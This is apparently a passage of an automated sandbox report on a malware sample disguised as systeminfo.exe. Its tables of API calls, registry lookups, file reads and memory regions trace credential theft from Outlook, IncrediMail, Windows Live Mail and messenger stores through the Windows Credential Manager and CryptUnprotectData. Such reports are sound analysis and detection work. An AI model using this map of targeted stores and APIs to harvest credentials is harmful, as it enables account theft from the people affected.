Registry	Enumerate Keys	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\IncrediMail\Identities	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Group Mail	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\MessengerService	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x756e0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x757271c1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x756eb2ec	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x75727941	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x75727381	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x75727481	1	Fn
Module	Load	module_name = crypt32.dll, base_address = 0x758d0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x75905a7f	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Yahoo\Pager	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x756e0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x757271c1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x756eb2ec	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x75727941	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x75727381	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x75727481	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, size = 1506, size_out = 1506	1	Fn Data
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, size = 670, size_out = 670	1	Fn Data
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, size = 1734, size_out = 1734	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	1	Fn
File	Create	filename = C:\ProgramData\FB2F.tmp, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ	1	Fn
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 11	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 12	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 14	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 5	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 0	1	Fn
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 2	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 4	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 14	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 0	1	Fn
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 7	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 0	1	Fn
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 4	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 1	1	Fn Data
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 0	1	Fn
File	Write	filename = C:\ProgramData\FB2F.tmp, size = 2	1	Fn Data

Process #13: systeminfo.exe

(Host: 63, Network: 0)

Information	Value
ID	#13
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:49, Reason: Autostart
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:00:34

OS Process Information

Information	Value
PID	0x5d8
Parent PID	0x4ec (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f544 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 5DC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x00081fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0009dfff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000000a0000	0x000a0000	0x000adfff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000b0000	0x000b0000	0x000effff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x000f0000	0x00156fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000160000	0x00160000	0x001dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000160000	0x00160000	0x0016ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000001a0000	0x001a0000	0x001dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000240000	0x00240000	0x0024ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000250000	0x00250000	0x0034ffff	Private Memory	Readable, Writable	Region Actions
systeminfo.exe	0x003d0000	0x003eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x00000000003f0000	0x003f0000	0x00577fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000005b0000	0x005b0000	0x005bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000005c0000	0x005c0000	0x0063ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000640000	0x00640000	0x007c0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000810000	0x00810000	0x0090ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000910000	0x00910000	0x01d0ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01d10000	0x01fdefff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001fe0000	0x01fe0000	0x020befff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000020c0000	0x020c0000	0x02490fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024a0000	0x024a0000	0x0259ffff	Private Memory	Readable, Writable	Region Actions
uxtheme.dll	0x73480000	0x734fffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x73640000	0x73690fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winmm.dll	0x736a0000	0x736d1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msacm32.dll	0x736e0000	0x736f3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x73700000	0x73707fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x73710000	0x7376bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73770000	0x737aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74b20000	0x74b2bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74b30000	0x74b8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x74b90000	0x74be6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x74d90000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x74e30000	0x74f3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x74f90000	0x7502cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75030000	0x75039fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75040000	0x7513ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x75140000	0x7519ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x751c0000	0x7531bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75f70000	0x7605ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76370000	0x7643bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76440000	0x764cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x764d0000	0x7655ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x76700000	0x76745fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76b00000	0x76babfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x76bb0000	0x76bc8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076bd0000	0x76bd0000	0x76cc9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076cd0000	0x76cd0000	0x76deefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76df0000	0x76f98fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76fd0000	0x7714ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Threads

Thread 0x5dc

(Host: 63, Network: 0)

Category	Operation	Information	Count	Logfile
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:40 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 13384	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:40 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 13384	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:40 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 13384	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:40 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 13384	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:40 (Local Time)	1	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:41 (Local Time)	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x34faac	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x34fae4	1	Fn
Module	Get Address	function = LoadLibraryA, ordinal = 0, address_out = 0x34fb54	1	Fn
Module	Get Address	function = UnmapViewOfFile, ordinal = 0, address_out = 0x34fb54	1	Fn
Module	Get Address	function = GetProcAddress, ordinal = 0, address_out = 0x34fb54	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x34fb54	1	Fn
Module	Get Address	function = VirtualProtect, ordinal = 0, address_out = 0x34fb54	1	Fn
Module	Get Address	function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x34fb54	1	Fn
Module	Get Address	function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x34fb54	1	Fn
Module	Load	module_name = msvcrt.dll, base_address = 0x76b00000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = strchr, address_out = 0x76b0dbeb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = free, address_out = 0x76b09894	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = malloc, address_out = 0x76b09cee	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x74e30000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74ee6aa8	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74e41700	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x74e6828e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x74e44435	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x74e45929	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x74e63102	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x74e454ee	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x74e44442	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74e41245	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x74e414b1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x74e5b6e0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameExA, address_out = 0x74ec42ef	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74e45a4b	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74e5eceb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74e411c0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74e414e9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x76ffe026	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74e414c9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74e411a9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74e41809	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74e411f8	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x75040000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7506ae5f	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x74d90000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x74dba4b4	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
System	Get Computer Name	result_out = YKyd69q, type = ComputerNameDnsHostname	1	Fn
Module	Get Handle	module_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, base_address = 0x3d0000	1	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 259	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x74e30000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x74ec3f49	1	Fn

Process #14: systeminfo.exe

(Host: 106, Network: 59)

Information	Value
ID	#14
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:03, Reason: Child Process
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:00:20

OS Process Information

Information	Value
PID	0x79c
Parent PID	0x5d8 (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f544 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 7A0 0x 7A4 0x 318 0x 760 0x 7D4 0x 794 0x 790 0x 78C 0x 784

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x000affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000b0000	0x000b0000	0x000c1fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000d0000	0x000d0000	0x000dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000edfff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000fdfff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000100000	0x00100000	0x0010ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000110000	0x00110000	0x0020ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00210000	0x00276fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000280000	0x00280000	0x002bffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000002c0000	0x002c0000	0x002c0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000002d0000	0x002d0000	0x002dffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000002d0000	0x002d0000	0x002d4fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000002d0000	0x002d0000	0x002d1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000002e0000	0x002e0000	0x0035ffff	Private Memory	Readable, Writable	Region Actions
systeminfo.exe	0x00360000	0x0037dfff	Memory Mapped File	Readable	Region Actions
rsaenh.dll	0x00360000	0x0039bfff	Memory Mapped File	Readable	Region Actions
rsaenh.dll	0x00360000	0x0039bfff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000360000	0x00360000	0x00364fff	Pagefile Backed Memory	Readable, Writable	Region Actions
windowsshell.manifest	0x00360000	0x00360fff	Memory Mapped File	Readable	Region Actions
index.dat	0x00360000	0x0036bfff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x0000000000370000	0x00370000	0x00371fff	Pagefile Backed Memory	Readable	Region Actions
index.dat	0x00380000	0x00387fff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x00390000	0x0039ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000003a0000	0x003a0000	0x003a0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000003a0000	0x003a0000	0x003a0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003b0000	0x003b0000	0x003b0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003c0000	0x003c0000	0x003c0fff	Pagefile Backed Memory	Readable	Region Actions
systeminfo.exe	0x003d0000	0x003eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000003f0000	0x003f0000	0x004bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003f0000	0x003f0000	0x0047ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003f0000	0x003f0000	0x0043ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000430000	0x00430000	0x0046ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000470000	0x00470000	0x0047ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000480000	0x00480000	0x004bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000004c0000	0x004c0000	0x005bffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000005c0000	0x005c0000	0x0069efff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000006d0000	0x006d0000	0x006dffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000006e0000	0x006e0000	0x00867fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000870000	0x00870000	0x009f0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000a00000	0x00a00000	0x01dfffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01e00000	0x020cefff	Memory Mapped File	Readable	Region Actions
private_0x00000000020d0000	0x020d0000	0x024a0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002110000	0x02110000	0x0214ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002150000	0x02150000	0x0218ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021d0000	0x021d0000	0x022cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002330000	0x02330000	0x0236ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002370000	0x02370000	0x0246ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024b0000	0x024b0000	0x025affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000025f0000	0x025f0000	0x0262ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002640000	0x02640000	0x0267ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002700000	0x02700000	0x027fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002800000	0x02800000	0x029affff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002850000	0x02850000	0x0288ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002900000	0x02900000	0x0293ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002970000	0x02970000	0x029affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000029d0000	0x029d0000	0x02acffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002ad0000	0x02ad0000	0x02bcffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002bd0000	0x02bd0000	0x02d4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002dd0000	0x02dd0000	0x02ecffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002ed0000	0x02ed0000	0x02fcffff	Private Memory	Readable, Writable	Region Actions
